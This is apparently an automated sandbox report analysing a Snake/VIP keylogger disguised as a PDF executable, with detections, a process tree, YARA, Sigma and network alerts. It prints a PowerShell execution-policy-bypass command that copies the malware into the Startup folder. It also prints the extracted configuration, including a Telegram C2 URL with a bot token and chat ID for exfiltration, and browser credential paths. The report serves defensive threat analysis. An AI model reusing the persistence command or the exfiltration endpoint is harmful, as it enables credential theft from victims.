Edit tour

Windows Analysis Report
PDF-3093900299039 pdf.exe

Overview

General Information

Sample name:	PDF-3093900299039 pdf.exe
Analysis ID:	1589962
MD5:	1f74495f02ad58ff437b07cf58a3e0ad
SHA1:	9efd59d289256116e9f539ffd7cc319603ac03ba
SHA256:	cd7aa2bca4b3612823b7e73160896e886a3e3ddd495c3ae7f2b47868c5dff0cf
Tags:	exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Copy file to startup via Powershell

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Bypasses PowerShell execution policy

Drops PE files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PDF-3093900299039 pdf.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)

powershell.exe (PID: 3260 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PDF-3093900299039 pdf.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)

svchost.exe (PID: 5856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

audiomaximizer.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)

powershell.exe (PID: 7432 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

audiomaximizer.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat id": "7437481970"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat_id": "7437481970", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6e8d1:$x1: In$J$ct0r
00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19cb3c:$a1: get_encryptedPassword 0x1e0f6c:$a1: get_encryptedPassword 0x22518c:$a1: get_encryptedPassword 0x19ce65:$a2: get_encryptedUsername 0x1e1295:$a2: get_encryptedUsername 0x2254b5:$a2: get_encryptedUsername 0x19c94c:$a3: get_timePasswordChanged 0x1e0d7c:$a3: get_timePasswordChanged 0x224f9c:$a3: get_timePasswordChanged 0x19ca55:$a4: get_passwordField 0x1e0e85:$a4: get_passwordField 0x2250a5:$a4: get_passwordField 0x19cb52:$a5: set_encryptedPassword 0x1e0f82:$a5: set_encryptedPassword 0x2251a2:$a5: set_encryptedPassword 0x19e255:$a7: get_logins 0x1e2685:$a7: get_logins 0x2268a5:$a7: get_logins 0x19e1b8:$a10: KeyLoggerEventArgs 0x1e25e8:$a10: KeyLoggerEventArgs 0x226808:$a10: KeyLoggerEventArgs
Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc6231:$a1: get_encryptedPassword 0xc6478:$a2: get_encryptedUsername 0xc6064:$a3: get_timePasswordChanged 0xc6154:$a4: get_passwordField 0xc6247:$a5: set_encryptedPassword 0xc809d:$a7: get_logins 0xc801e:$a10: KeyLoggerEventArgs 0xc7d97:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: audiomaximizer.exe PID: 7404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: audiomaximizer.exe PID: 7556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: audiomaximizer.exe PID: 7556	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: audiomaximizer.exe PID: 7556	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.PDF-3093900299039 pdf.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f16a:$s1: UnHook 0x2f171:$s2: SetHook 0x2f179:$s3: CallNextHook 0x2f186:$s4: _hook
0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6cad1:$x1: In$J$ct0r
0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6cad1:$x1: In$J$ct0r
0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6e8d1:$x1: In$J$ct0r
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c72c:$a1: get_encryptedPassword 0x2ca55:$a2: get_encryptedUsername 0x2c53c:$a3: get_timePasswordChanged 0x2c645:$a4: get_passwordField 0x2c742:$a5: set_encryptedPassword 0x2de45:$a7: get_logins 0x2dda8:$a10: KeyLoggerEventArgs 0x2da0d:$a11: KeyLoggerEventArgsEventHandler
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a893:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f36:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a193:$a4: \Orbitum\User Data\Default\Login Data 0x3ab72:$a5: \Kometa\User Data\Default\Login Data
0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d36a:$s1: UnHook 0x2d371:$s2: SetHook 0x2d379:$s3: CallNextHook 0x2d386:$s4: _hook
5.2.audiomaximizer.exe.333b070.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa2098:$x1: In$J$ct0r 0xa2e4c:$a1: WriteProcessMemory 0xa2ed8:$a1: WriteProcessMemory 0xa2fac:$a4: VirtualAllocEx 0xa31d0:$a4: VirtualAllocEx 0xa3250:$a4: VirtualAllocEx
5.2.audiomaximizer.exe.3338830.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48d8:$x1: In$J$ct0r 0xa568c:$a1: WriteProcessMemory 0xa5718:$a1: WriteProcessMemory 0xa57ec:$a4: VirtualAllocEx 0xa5a10:$a4: VirtualAllocEx 0xa5a90:$a4: VirtualAllocEx
0.2.PDF-3093900299039 pdf.exe.2a98348.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa563c:$a1: WriteProcessMemory 0xa56c8:$a1: WriteProcessMemory 0xa579c:$a4: VirtualAllocEx 0xa59c0:$a4: VirtualAllocEx 0xa5a40:$a4: VirtualAllocEx
0.2.PDF-3093900299039 pdf.exe.2a9ab88.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2dfc:$a1: WriteProcessMemory 0xa2e88:$a1: WriteProcessMemory 0xa2f5c:$a4: VirtualAllocEx 0xa3180:$a4: VirtualAllocEx 0xa3200:$a4: VirtualAllocEx
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e52c:$a1: get_encryptedPassword 0x7295c:$a1: get_encryptedPassword 0xb6b7c:$a1: get_encryptedPassword 0x2e855:$a2: get_encryptedUsername 0x72c85:$a2: get_encryptedUsername 0xb6ea5:$a2: get_encryptedUsername 0x2e33c:$a3: get_timePasswordChanged 0x7276c:$a3: get_timePasswordChanged 0xb698c:$a3: get_timePasswordChanged 0x2e445:$a4: get_passwordField 0x72875:$a4: get_passwordField 0xb6a95:$a4: get_passwordField 0x2e542:$a5: set_encryptedPassword 0x72972:$a5: set_encryptedPassword 0xb6b92:$a5: set_encryptedPassword 0x2fc45:$a7: get_logins 0x74075:$a7: get_logins 0xb8295:$a7: get_logins 0x2fba8:$a10: KeyLoggerEventArgs 0x73fd8:$a10: KeyLoggerEventArgs 0xb81f8:$a10: KeyLoggerEventArgs
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c693:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80ac3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc4ce3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd36:$a3: \Google\Chrome\User Data\Default\Login Data 0x80166:$a3: \Google\Chrome\User Data\Default\Login Data 0xc4386:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf93:$a4: \Orbitum\User Data\Default\Login Data 0x803c3:$a4: \Orbitum\User Data\Default\Login Data 0xc45e3:$a4: \Orbitum\User Data\Default\Login Data 0x3c972:$a5: \Kometa\User Data\Default\Login Data 0x80da2:$a5: \Kometa\User Data\Default\Login Data 0xc4fc2:$a5: \Kometa\User Data\Default\Login Data
0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f16a:$s1: UnHook 0x7359a:$s1: UnHook 0xb77ba:$s1: UnHook 0x2f171:$s2: SetHook 0x735a1:$s2: SetHook 0xb77c1:$s2: SetHook 0x2f179:$s3: CallNextHook 0x735a9:$s3: CallNextHook 0xb77c9:$s3: CallNextHook 0x2f186:$s4: _hook 0x735b6:$s4: _hook 0xb77d6:$s4: _hook
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x129bcc:$a1: get_encryptedPassword 0x16dffc:$a1: get_encryptedPassword 0x1b221c:$a1: get_encryptedPassword 0x129ef5:$a2: get_encryptedUsername 0x16e325:$a2: get_encryptedUsername 0x1b2545:$a2: get_encryptedUsername 0x1299dc:$a3: get_timePasswordChanged 0x16de0c:$a3: get_timePasswordChanged 0x1b202c:$a3: get_timePasswordChanged 0x129ae5:$a4: get_passwordField 0x16df15:$a4: get_passwordField 0x1b2135:$a4: get_passwordField 0x129be2:$a5: set_encryptedPassword 0x16e012:$a5: set_encryptedPassword 0x1b2232:$a5: set_encryptedPassword 0x12b2e5:$a7: get_logins 0x16f715:$a7: get_logins 0x1b3935:$a7: get_logins 0x12b248:$a10: KeyLoggerEventArgs 0x16f678:$a10: KeyLoggerEventArgs 0x1b3898:$a10: KeyLoggerEventArgs
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12a80a:$s1: UnHook 0x16ec3a:$s1: UnHook 0x1b2e5a:$s1: UnHook 0x12a811:$s2: SetHook 0x16ec41:$s2: SetHook 0x1b2e61:$s2: SetHook 0x12a819:$s3: CallNextHook 0x16ec49:$s3: CallNextHook 0x1b2e69:$s3: CallNextHook 0x12a826:$s4: _hook 0x16ec56:$s4: _hook 0x1b2e76:$s4: _hook
0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6e8d1:$x1: In$J$ct0r
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5856, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T12:08:11.496106+0100	2803305	3	Unknown Traffic	192.168.2.4	49735	104.21.32.1	443	TCP
2025-01-13T12:08:12.958118+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-13T12:08:22.862735+0100	2803305	3	Unknown Traffic	192.168.2.4	49755	104.21.32.1	443	TCP
2025-01-13T12:08:22.885124+0100	2803305	3	Unknown Traffic	192.168.2.4	49756	104.21.32.1	443	TCP
2025-01-13T12:08:27.383740+0100	2803305	3	Unknown Traffic	192.168.2.4	49767	104.21.32.1	443	TCP
2025-01-13T12:08:34.618729+0100	2803305	3	Unknown Traffic	192.168.2.4	49776	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T12:08:09.909474+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.8.169	80	TCP
2025-01-13T12:08:10.940721+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.8.169	80	TCP
2025-01-13T12:08:12.393944+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.8.169	80	TCP
2025-01-13T12:08:21.253202+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	132.226.8.169	80	TCP
2025-01-13T12:08:22.253242+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	132.226.8.169	80	TCP
2025-01-13T12:08:23.846956+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49759	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T12:08:32.634045+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49773	149.154.167.220	443	TCP
2025-01-13T12:08:43.414538+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49778	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T12:08:23.765386+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49760	149.154.167.220	443	TCP
2025-01-13T12:08:35.524227+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49777	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PDF-3093900299039 pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Avira: detection malicious, Label: HEUR/AGEN.1309800

Found malware configuration

Source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat_id": "7437481970", "Version": "4.4"}
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat id": "7437481970"}
Source: audiomaximizer.exe.7556.8.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Virustotal: Detection: 63%			Perma Link

Multi AV Scanner detection for submitted file

Source: PDF-3093900299039 pdf.exe	Virustotal: Detection: 63%			Perma Link
Source: PDF-3093900299039 pdf.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Joe Sandbox ML: detected

